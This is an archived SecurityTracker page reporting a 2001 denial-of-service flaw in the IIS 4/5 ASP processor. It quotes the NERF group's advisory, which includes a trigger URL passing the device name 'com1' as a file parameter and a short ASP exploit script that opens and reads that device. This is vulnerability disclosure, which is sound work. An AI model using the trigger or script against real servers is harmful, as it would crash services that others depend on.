SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
Microsoft's Internet Information Server's ASP Processor Can Be Crashed by Remote Users in Certain Situations
SecurityTracker Alert ID:  1001923
SecurityTracker URL:  http://securitytracker.com/id/1001923
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 5 2001
Impact:   Denial of service via local system, Denial of service via network
Exploit Included:  Yes  
Version(s): IIS 4, 5
Description:   A vulnerability was reported in Microsoft Interent Information Server's ASP processor that allows remote users to cause the ASP processor to crash in certain situations.

NERF gr0up reported a vulnerability in the ASP processor (asp.dll) that can be triggered when device files (e.g., com1, com2) using Scripting.FileSystemObject will crash ASP-processor (asp.dll).

A local user that has permissions to create .asp files can create ASP pages that will cause the ASP processor to crash.

If an ASP script will read user-specified files, a remote user can pass a device name as a file parameter to cause the ASP processor to crash, using a request such as:

http://[targethost]/scripts/script.asp?script=com1

An exploit is included in the Source Message.

Impact:   A local or remote user can cause the IIS ASP processor to crash, requiring the process to be restarted to return to normal operations.
Solution:   No vendor solution was available at the time of this entry. Authors of ASP scripts can ensure that files to be opened by Scripting.FileSystemObject to check a file for existing before opening the file.
Vendor URL:  www.microsoft.com/technet/security (Links to External Site)
Cause:   Resource error, State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  NERF Advisory #4: MS IIS local and remote DoS


                              --== NERF gr0up security advisory #4 ==--  
                                  MS IIS local and remote DoS      

1. Vulnerable soft: IIS 4,5   

2. Description:
Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject will crash ASP-processor (asp.dll).
 
3. Local exploit:
If you have permission on creating .asp-file, you can crash ASP-processor.
 
4. Remote exploit:
Sometimes filename passing as asp-script param, which open and read data from file. Passing param as device file will
crash asp-processor.
http://host.int/scripts/script.asp?script=com1
 
5. Solution:
Fix Scripting.FileSystemObject (have to check file for existing before openning.
 
6. ASP-Exploit:
 
<%
  Dim strFileName, objFSO, objFile
 
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
 
  strFileName = "com1"
 
  Set objFile = objFSO.OpenTextFile(strFileName)
 
  Response.Write objFile.ReadAll
 
  objFile.Close

%>
 
7.Sorry:
for poor english
---------------------------------------------------
Found by buggzy (buggzy@nerf.ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC